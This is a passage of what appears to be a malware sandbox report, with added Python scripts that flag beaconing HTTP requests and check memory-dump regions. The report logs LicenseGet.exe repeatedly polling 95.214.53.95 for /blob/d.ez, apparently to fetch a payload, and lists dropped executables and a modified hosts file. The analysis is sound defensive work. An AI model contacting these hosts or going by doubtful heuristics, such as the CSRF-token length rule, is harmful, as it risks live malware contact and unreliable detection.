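Cookie: CSRF-TOKEN=pw96kcJsbltYjVIJPT9nDSspjIyqu2JHfLeXchElZU59WewXswpewjQ/U+dlBJ2LwFwcxUM1nk4zS6f3186+rg==; LANG=en-US""",
     "HTTP/1.1 404 Not Found\nServer: nginx\nDate: Fri, 04 Oct 2024 04:57:04 GMT"),
    ("""GET /blob/d.ez HTTP/1.1
Host: 95.214.53.95
User-Agent: curl/5.9
Connection: close
X-CSRF-TOKEN: qh7TxZpj4kXepAcKn3+We1b3FwEFgxJLfRGAdoW2pjvFmUQEpk9O4iSry4yPdn2dJ1XmYQI+3Ev2Pn8HbXudEA==
Cookie: CSRF-TOKEN=qh7TxZpj4kXepAcKn3+We1b3FwEFgxJLfRGAdoW2pjvFmUQEpk9O4iSry4yPdn2dJ1XmYQI+3Ev2Pn8HbXudEA==; LANG=en-US""",
     "HTTP/1.1 404 Not Found\nServer: nginx\nDate: Fri, 04 Oct 2024 04:57:09 GMT"),
    ("""GET /blob/d.ez HTTP/1.1
Host: 95.214.53.95
User-Agent: curl/5.9
Connection: close
X-CSRF-TOKEN: Opx2AfOBXpdnXnenyVjY95lCsV+9sbatgBg40l3u7YKnyC89vtF1UEl6UWA0l2tz/LtcCZjNBLFdJnz8RZEM0Q==
Cookie: CSRF-TOKEN=Opx2AfOBXpdnXnenyVjY95lCsV+9sbatgBg40l3u7YKnyC89vtF1UEl6UWA0l2tz/LtcCZjNBLFdJnz8RZEM0Q==; LANG=en-US""",
     "HTTP/1.1 404 Not Found\nServer: nginx\nDate: Fri, 04 Oct 2024 04:57:15 GMT"),
]


def parse_message(raw):
    """Split an HTTP/1.1 message head into (start line, {lowercased header: value})."""
    lines = raw.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")  # split on the first colon only
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def parse_cookies(cookie_header):
    """'a=1; b=2' -> {'a': '1', 'b': '2'}; a value may itself contain '='."""
    out = {}
    for part in cookie_header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            out[name] = value
    return out


def curl_version_implausible(user_agent):
    """Assumption used here: real curl has shipped as 7.x/8.x since 2000, so a
    'curl/<major>' below 7 is a hand-written User-Agent rather than a curl build."""
    m = re.match(r"curl/(\d+)\.", user_agent)
    return bool(m) and int(m.group(1)) < 7


def decoded_token_length(token):
    """Number of bytes a base64 token decodes to, or -1 if it is not valid base64."""
    try:
        return len(base64.b64decode(token, validate=True))
    except (binascii.Error, ValueError):
        return -1


def is_ip_literal(host):
    """True when the Host header is an IPv4 literal (optionally host:port)."""
    try:
        ip_address(host.rsplit(":", 1)[0])
        return True
    except ValueError:
        return False


def analyze(records):
    """Per-request flags plus the polling cadence derived from response Date headers."""
    per_request, timestamps, statuses = [], [], []
    for req_raw, resp_raw in records:
        req_line, req = parse_message(req_raw)
        resp_line, resp = parse_message(resp_raw)
        flags = []
        if is_ip_literal(req.get("host", "")):
            flags.append("host-is-ip-literal")
        if curl_version_implausible(req.get("user-agent", "")):
            flags.append("implausible-curl-version")
        token = req.get("x-csrf-token", "")
        cookies = parse_cookies(req.get("cookie", ""))
        if token and cookies.get("CSRF-TOKEN") == token:
            flags.append("csrf-token-mirrored-in-cookie")
        if decoded_token_length(token) >= 32:  # 32+ random bytes is no CSRF nonce
            flags.append("token-is-random-looking-blob")
        per_request.append({"request": req_line, "flags": flags})
        statuses.append(int(resp_line.split()[1]))
        timestamps.append(parsedate_to_datetime(resp["date"]))
    intervals = [(b - a).total_seconds() for a, b in zip(timestamps, timestamps[1:])]
    return {
        "per_request": per_request,
        "statuses": statuses,
        "intervals_s": intervals,
        # jitter under 2 s across the window is treated as a fixed-interval poll
        "periodic": len(intervals) >= 2 and max(intervals) - min(intervals) <= 2.0,
    }


if __name__ == "__main__":
    result = analyze(RECORDS)
    for entry in result["per_request"]:
        print(entry["request"], entry["flags"])
    print("statuses", result["statuses"], "intervals", result["intervals_s"],
          "periodic", result["periodic"])
```

The cadence check uses the server's Date header because it is the only timestamp the page preserves per transaction; on a live capture you would use packet timestamps instead. None of the four per-request flags is conclusive alone (a bare-IP host or an odd User-Agent each occur in benign traffic), but all four together on a fixed-interval GET that keeps returning 404 is the pattern worth alerting on.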
Remote address       Request                          Protocol  Process         Sent    Received  Pkts sent  Pkts recv  HTTP
185.166.142.21:443   bitbucket.org                    tls       powershell.exe  61.2kB  2.9MB     1190       2116       -
95.214.53.95:80      http://95.214.53.95/blob/d.ez    http      LicenseGet.exe  543 B   481 B     5          5          GET -> 404
95.214.53.95:80      http://95.214.53.95/blob/d.ez    http      LicenseGet.exe  543 B   481 B     5          5          GET -> 404
95.214.53.95:80      http://95.214.53.95/blob/d.ez    http      LicenseGet.exe  543 B   481 B     5          5          GET -> 404
95.214.53.95:80      http://95.214.53.95/blob/d.ez    http      LicenseGet.exe  543 B   481 B     5          5          GET -> 404
95.214.53.95:80      http://95.214.53.95/blob/d.ez    http      LicenseGet.exe  543 B   481 B     5          5          GET -> 404
95.214.53.95:80      http://95.214.53.95/blob/d.ez    http      LicenseGet.exe  543 B   481 B     5          5          GET -> 404
95.214.53.95:80      http://95.214.53.95/blob/d.ez    http      LicenseGet.exe  543 B   481 B     5          5          GET -> 404
95.214.53.95:80      http://95.214.53.95/blob/d.ez    http      LicenseGet.exe  497 B   481 B     4          5          GET -> 404
95.214.53.95:80      http://95.214.53.95/blob/d.ez    http      LicenseGet.exe  543 B   481 B     5          5          GET -> 404
95.214.53.95:80      http://95.214.53.95/blob/d.ez    http      LicenseGet.exe  497 B   481 B     4          5          GET -> 404
95.214.53.95:80      http://95.214.53.95/blob/d.ez    http      LicenseGet.exe  543 B   481 B     5          5          GET -> 404
95.214.53.95:80      http://95.214.53.95/blob/d.ez    http      LicenseGet.exe  543 B   481 B     5          5          GET -> 404
95.214.53.95:80      http://95.214.53.95/blob/d.ez    http      LicenseGet.exe  543 B   481 B     5          5          GET -> 404
95.214.53.95:80      http://95.214.53.95/blob/d.ez    http      LicenseGet.exe  543 B   481 B     5          5          GET -> 404
95.214.53.95:80      http://95.214.53.95/blob/d.ez    http      LicenseGet.exe  543 B   481 B     5          5          GET -> 404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                  481 B
                                                                                                                                  5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 45.159.189.105:80
                                                                                                                                  svcupdater.exe
                                                                                                                                  260 B
                                                                                                                                  200 B
                                                                                                                                  5
                                                                                                                                  5
                                                                                                                                • 45.159.189.105:80
                                                                                                                                  svcupdater.exe
                                                                                                                                  260 B
                                                                                                                                  200 B
                                                                                                                                  5
                                                                                                                                  5
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                  481 B
                                                                                                                                  5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                  481 B
                                                                                                                                  5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                  481 B
                                                                                                                                  5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                  481 B
                                                                                                                                  5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                  481 B
                                                                                                                                  5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                  481 B
                                                                                                                                  5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                  481 B
                                                                                                                                  5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                  481 B
                                                                                                                                  5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                  481 B
                                                                                                                                  5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                  481 B
                                                                                                                                  5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                  481 B
                                                                                                                                  5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                  481 B
                                                                                                                                  5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 45.159.189.105:80
                                                                                                                                  svcupdater.exe
                                                                                                                                  208 B
                                                                                                                                  120 B
                                                                                                                                  4
                                                                                                                                  3
                                                                                                                                • 8.8.8.8:53
                                                                                                                                  bitbucket.org
                                                                                                                                  dns
                                                                                                                                  powershell.exe
                                                                                                                                  284 B
                                                                                                                                  579 B
                                                                                                                                  4
                                                                                                                                  4

                                                                                                                                  DNS Request

                                                                                                                                  bitbucket.org

                                                                                                                                  DNS Response

                                                                                                                                  185.166.142.21
                                                                                                                                  185.166.142.23
                                                                                                                                  185.166.142.22

                                                                                                                                  DNS Request

                                                                                                                                  21.142.166.185.in-addr.arpa

                                                                                                                                  DNS Request

                                                                                                                                  nexusrules.officeapps.live.com

                                                                                                                                  DNS Response

                                                                                                                                  52.111.227.14

                                                                                                                                  DNS Request

                                                                                                                                  self.events.data.microsoft.com

                                                                                                                                  DNS Response

                                                                                                                                  20.50.201.200

• 8.8.8.8:53
  8.8.8.8.in-addr.arpa
  dns
  NetworkService
  281 B
  540 B
  4
  4
  DNS Request: 8.8.8.8.in-addr.arpa
  DNS Request: 95.53.214.95.in-addr.arpa
  DNS Request: 14.227.111.52.in-addr.arpa
  DNS Request: 200.201.50.20.in-addr.arpa

MITRE ATT&CK Enterprise v15


Downloads

• C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: 22e796539d05c5390c21787da1fb4c2b
  SHA1: 55320ebdedd3069b2aaf1a258462600d9ef53a58
  SHA256: 7c6c09f48f03421430d707d27632810414e5e2bf2eecd5eb675fecf8b45a9a92
  SHA512: d9cc0cb22df56db72a71504bb3ebc36697e0a7a1d2869e0e0ab61349bda603298fe6c667737b79bf2235314fb49b883ba4c5f137d002e273e79391038ecf9c09

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 0f0f33b5dc59d6998bdba6a65e602a1c
  SHA1: 80c26491daacdd38a1f174ea5a6be01532bc1da9
  SHA256: a5e18203246fdf1199469165357bd5329f0e8f4a77282045c01a43cba0a7e2ed
  SHA512: 12027f852b46df30587773e35cd2e380a4876557b2b857dcbbbf3650e44c8c88e4c0ea085d125e5c19258d860e0a4bf27f48c7f0a9ec4181f03534df1d91ef4f

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 84c0fa3acb402d14d6dee887fff65c32
  SHA1: fdb1eeed65e483e62e02add58b5b2739e79a8d1c
  SHA256: 681d19d7fe874300cb306fca9f7f3eb543770749d2e120cb15d69894e28ef13f
  SHA512: 3eaa76c978abbaec59ff7a7af20db9c1695a45904a7697dd7285c3543da70e8ef4853a366c5676d4eaa15eb685fe03a78f495afd6191814bb78f95173990f083

• C:\Users\Admin\AppData\Local\Temp\LicCheck.exe
  Filesize: 287KB
  MD5: 726a5b76f4c40551741ffdda14088ce3
  SHA1: df94d2f5475e8550b8d8f5de6937f896bf0ea6b8
  SHA256: 69487840add22f155734e6e522e5e1437814caccc14e137e0a9a602b790a4cb9
  SHA512: 477ce8e7b4dfdf288bce73bf3f30ce8a94c53617903eb5b5b9b4bb61795e56ed4cd908100f88fab76ff67fb7df6c94280be50576e672fcac27589117e1c7ce06

• C:\Users\Admin\AppData\Local\Temp\LicSend.exe
  Filesize: 2.2MB
  MD5: 4648d5ef582c7b17d9712f5b5b60f046
  SHA1: 249bac0094f6aec1c4bb36f704ddca1c708401a7
  SHA256: 0dbed06724205e7995f45b769454c3ebfd832f633471729eebce756cb90fc348
  SHA512: 04839048b38a1bcff4254c77f479475c0b2e30e2d2be5fae65f23274107064a3d0abb3ca8d1693a1809db4db9dfbe7a2681c169ebe536fefb0cb01330d118f6f

• C:\Users\Admin\AppData\Local\Temp\LicenseGet.exe
  Filesize: 204KB
  MD5: e9b8360ea19d6c4f82f9fdb3adb8b566
  SHA1: d488e41552b2395c92be89473c9bdcde41795d18
  SHA256: 31c9833faf987402ff5144a5690938f4e2bf6a8fcaf22b2df271c7e43d9f3e07
  SHA512: 699934c81503f512a50f1ad3dd9ada48a38cc8f5a608b9bada9cea5d0f0d1e5340b59eb41fec528ad90d92351dd922daeabb459baea2da89ae2bf45963ce4f4d

• C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xztqibyv.0ty.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

• C:\Windows\system32\drivers\etc\hosts
  Filesize: 4KB
  MD5: 26fcacd27377df115ef919213279e2a9
  SHA1: 4eb3e59e6bb7c2ea1e779bae96b88bce66643c76
  SHA256: f85baf14da37326dcdf2a1553216a1d8325cb7a6b7c73478b6bf1a443823f28f
  SHA512: 32578825f25bdddef862d492a1d01e2a5b692dc22639cf4d1538121d28407e50ae86f7a99a20857dc6032f9ba0f8dc095b479610f610262bedeee63b88785739

• memory/552-89-0x00000000041B0000-0x00000000041D2000-memory.dmp
  Filesize: 136KB

• memory/552-104-0x0000000004F90000-0x0000000004FDC000-memory.dmp
  Filesize: 304KB

• memory/552-90-0x00000000048B0000-0x0000000004916000-memory.dmp
  Filesize: 408KB

• memory/552-359-0x0000000005560000-0x000000000557A000-memory.dmp
  Filesize: 104KB

• memory/552-91-0x0000000004920000-0x0000000004986000-memory.dmp
  Filesize: 408KB

• memory/552-358-0x0000000006990000-0x000000000700A000-memory.dmp
  Filesize: 6.5MB

• memory/552-102-0x0000000004F60000-0x0000000004F7E000-memory.dmp
  Filesize: 120KB

• memory/552-100-0x0000000004A50000-0x0000000004DA7000-memory.dmp
  Filesize: 3.3MB

• memory/552-87-0x0000000003AE0000-0x0000000003B16000-memory.dmp
  Filesize: 216KB

• memory/552-88-0x0000000004280000-0x00000000048AA000-memory.dmp
  Filesize: 6.2MB

• memory/568-121-0x000001F370A70000-0x000001F370A97000-memory.dmp
  Filesize: 156KB

• memory/568-123-0x00007FFA4C190000-0x00007FFA4C1A0000-memory.dmp
  Filesize: 64KB

• memory/644-113-0x000001EE624F0000-0x000001EE62511000-memory.dmp
  Filesize: 132KB

• memory/644-114-0x000001EE62520000-0x000001EE62547000-memory.dmp
  Filesize: 156KB

• memory/644-115-0x00007FFA4C190000-0x00007FFA4C1A0000-memory.dmp
  Filesize: 64KB

• memory/704-120-0x000001FA13C30000-0x000001FA13C57000-memory.dmp
  Filesize: 156KB

• memory/704-122-0x00007FFA4C190000-0x00007FFA4C1A0000-memory.dmp
  Filesize: 64KB

• memory/996-126-0x000002DA02360000-0x000002DA02387000-memory.dmp
  Filesize: 156KB

• memory/996-127-0x00007FFA4C190000-0x00007FFA4C1A0000-memory.dmp
  Filesize: 64KB

• memory/1040-131-0x000001E6C8900000-0x000001E6C8927000-memory.dmp
  Filesize: 156KB

• memory/1040-132-0x00007FFA4C190000-0x00007FFA4C1A0000-memory.dmp
  Filesize: 64KB

• memory/1048-135-0x00007FFA4C190000-0x00007FFA4C1A0000-memory.dmp
  Filesize: 64KB

• memory/1048-134-0x000002992AD00000-0x000002992AD27000-memory.dmp
  Filesize: 156KB

• memory/1056-143-0x00000250AD370000-0x00000250AD397000-memory.dmp
  Filesize: 156KB

• memory/1056-144-0x00007FFA4C190000-0x00007FFA4C1A0000-memory.dmp
  Filesize: 64KB

• memory/1068-146-0x00000276BEB40000-0x00000276BEB67000-memory.dmp
  Filesize: 156KB

• memory/1068-147-0x00007FFA4C190000-0x00007FFA4C1A0000-memory.dmp
  Filesize: 64KB

• memory/1148-150-0x00007FFA4C190000-0x00007FFA4C1A0000-memory.dmp
  Filesize: 64KB

• memory/1148-149-0x0000027D85560000-0x0000027D85587000-memory.dmp
  Filesize: 156KB

• memory/1240-153-0x00007FFA4C190000-0x00007FFA4C1A0000-memory.dmp
  Filesize: 64KB

• memory/1240-152-0x0000019860D40000-0x0000019860D67000-memory.dmp
  Filesize: 156KB

• memory/1252-156-0x00007FFA4C190000-0x00007FFA4C1A0000-memory.dmp
  Filesize: 64KB

• memory/1252-155-0x00000197AD550000-0x00000197AD577000-memory.dmp
  Filesize: 156KB

• memory/1332-159-0x00007FFA4C190000-0x00007FFA4C1A0000-memory.dmp
  Filesize: 64KB

• memory/1332-158-0x000001895D560000-0x000001895D587000-memory.dmp
  Filesize: 156KB

• memory/2376-78-0x00007FF6E2280000-0x00007FF6E22A9000-memory.dmp
  Filesize: 164KB

• memory/2416-77-0x00007FF64A490000-0x00007FF64A6D0000-memory.dmp
  Filesize: 2.2MB

• memory/2848-11-0x000002CCBA910000-0x000002CCBA932000-memory.dmp
  Filesize: 136KB

• memory/2848-12-0x00007FFA6B2B0000-0x00007FFA6BD72000-memory.dmp
  Filesize: 10.8MB

• memory/2848-13-0x00007FFA6B2B0000-0x00007FFA6BD72000-memory.dmp
  Filesize:

                                                                                                                                  10.8MB

                                                                                                                                • memory/2848-14-0x00007FFA6B2B0000-0x00007FFA6BD72000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  10.8MB

                                                                                                                                • memory/2848-48-0x00007FFA6B2B0000-0x00007FFA6BD72000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  10.8MB

                                                                                                                                • memory/3068-106-0x0000000140000000-0x0000000140029000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  164KB

                                                                                                                                • memory/3068-110-0x0000000140000000-0x0000000140029000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  164KB

                                                                                                                                • memory/3068-107-0x0000000140000000-0x0000000140029000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  164KB

                                                                                                                                • memory/3068-109-0x00007FFA8B150000-0x00007FFA8B20D000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  756KB

                                                                                                                                • memory/3068-108-0x00007FFA8C100000-0x00007FFA8C309000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  2.0MB

                                                                                                                                • memory/3968-101-0x000001667BCE0000-0x000001667BD06000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  152KB

                                                                                                                                • memory/3968-103-0x00007FFA8C100000-0x00007FFA8C309000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  2.0MB

                                                                                                                                • memory/3968-105-0x00007FFA8B150000-0x00007FFA8B20D000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  756KB

                                                                                                                                • memory/4252-0-0x00007FFA6B2B3000-0x00007FFA6B2B5000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/4252-1-0x0000000000700000-0x000000000070C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  48KB
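The memory-dump names above encode the owning PID and the start and end virtual address of each region, so a quick sanity check is to parse them, confirm that the reported Filesize matches the address range, collapse the repeated dumps of the same region (PID 2848 and PID 3068 each have one region dumped several times), and flag any region that sits at 0x140000000, the default image base the MSVC linker assigns to 64-bit executables, which is a common heuristic (not conclusive) sign of a manually mapped PE in a process whose own image lives elsewhere. The Python below is an added example, not tria.ge code; the entries are copied from the list above, and the 0x140000000 heuristic and the size-tolerance rule are assumptions of this example.

```python
"""Cross-check tria.ge memory-region artefacts (added example, not tria.ge code)."""
import re
from collections import defaultdict

# Artefact names follow memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp
REGION_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)
SIZE_RE = re.compile(r"^(?P<num>\d+(?:\.\d+)?)(?P<unit>KB|MB)$")
UNIT = {"KB": 1024, "MB": 1024 * 1024}

# Default base the MSVC linker gives 64-bit executables. A region mapped exactly
# there in a process whose own image lives elsewhere is an assumed heuristic
# (not conclusive) indicator of a manually mapped PE.
DEFAULT_X64_IMAGE_BASE = 0x140000000

# The dump list from this report, copied as (artefact name, reported Filesize).
ENTRIES = [
    ("memory/1252-156-0x00007FFA4C190000-0x00007FFA4C1A0000-memory.dmp", "64KB"),
    ("memory/1252-155-0x00000197AD550000-0x00000197AD577000-memory.dmp", "156KB"),
    ("memory/1332-159-0x00007FFA4C190000-0x00007FFA4C1A0000-memory.dmp", "64KB"),
    ("memory/1332-158-0x000001895D560000-0x000001895D587000-memory.dmp", "156KB"),
    ("memory/2376-78-0x00007FF6E2280000-0x00007FF6E22A9000-memory.dmp", "164KB"),
    ("memory/2416-77-0x00007FF64A490000-0x00007FF64A6D0000-memory.dmp", "2.2MB"),
    ("memory/2848-11-0x000002CCBA910000-0x000002CCBA932000-memory.dmp", "136KB"),
    ("memory/2848-12-0x00007FFA6B2B0000-0x00007FFA6BD72000-memory.dmp", "10.8MB"),
    ("memory/2848-13-0x00007FFA6B2B0000-0x00007FFA6BD72000-memory.dmp", "10.8MB"),
    ("memory/2848-14-0x00007FFA6B2B0000-0x00007FFA6BD72000-memory.dmp", "10.8MB"),
    ("memory/2848-48-0x00007FFA6B2B0000-0x00007FFA6BD72000-memory.dmp", "10.8MB"),
    ("memory/3068-106-0x0000000140000000-0x0000000140029000-memory.dmp", "164KB"),
    ("memory/3068-110-0x0000000140000000-0x0000000140029000-memory.dmp", "164KB"),
    ("memory/3068-107-0x0000000140000000-0x0000000140029000-memory.dmp", "164KB"),
    ("memory/3068-109-0x00007FFA8B150000-0x00007FFA8B20D000-memory.dmp", "756KB"),
    ("memory/3068-108-0x00007FFA8C100000-0x00007FFA8C309000-memory.dmp", "2.0MB"),
    ("memory/3968-101-0x000001667BCE0000-0x000001667BD06000-memory.dmp", "152KB"),
    ("memory/3968-103-0x00007FFA8C100000-0x00007FFA8C309000-memory.dmp", "2.0MB"),
    ("memory/3968-105-0x00007FFA8B150000-0x00007FFA8B20D000-memory.dmp", "756KB"),
    ("memory/4252-0-0x00007FFA6B2B3000-0x00007FFA6B2B5000-memory.dmp", "8KB"),
    ("memory/4252-1-0x0000000000700000-0x000000000070C000-memory.dmp", "48KB"),
]


def parse_region(name, reported):
    """Return a dict describing one region; raise ValueError on a malformed entry."""
    m = REGION_RE.match(name)
    s = SIZE_RE.match(reported)
    if m is None or s is None:
        raise ValueError(f"unrecognised entry: {name!r} / {reported!r}")
    start, end = int(m["start"], 16), int(m["end"], 16)
    if end <= start:
        raise ValueError(f"end before start in {name!r}")
    unit = UNIT[s["unit"]]
    return {
        "pid": int(m["pid"]),
        "seq": int(m["seq"]),
        "start": start,
        "end": end,
        "size": end - start,
        "reported_bytes": float(s["num"]) * unit,
        "unit": unit,
    }


def size_consistent(region):
    """The report rounds to one decimal place, so allow a tenth of the unit of slack."""
    return abs(region["size"] - region["reported_bytes"]) <= region["unit"] / 10


def summarize(entries):
    """Per-PID unique region count, size mismatches, default-base hits, largest region."""
    regions = [parse_region(name, size) for name, size in entries]
    unique = defaultdict(set)
    for r in regions:
        unique[r["pid"]].add((r["start"], r["end"]))
    largest = max(regions, key=lambda r: r["size"])
    return {
        "unique_regions": {pid: len(v) for pid, v in unique.items()},
        "mismatches": [(r["pid"], r["seq"]) for r in regions if not size_consistent(r)],
        "default_base_hits": sorted({r["pid"] for r in regions
                                     if r["start"] == DEFAULT_X64_IMAGE_BASE}),
        "largest": (largest["pid"], largest["start"], largest["size"]),
    }


if __name__ == "__main__":
    from pprint import pprint
    pprint(summarize(ENTRIES))
```

Run against this report the check reports no size mismatches, two distinct regions for PID 2848 despite its five dumps, three for PID 3068, PID 3068 as the only process with a region at the default x64 image base, and the 10.8MB region in PID 2848 as the largest dump. The address ranges shared between PIDs (1252 and 1332, 3068 and 3968) are the same module mapped at the same base in sibling processes, which is what you would expect from ASLR on a single boot.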
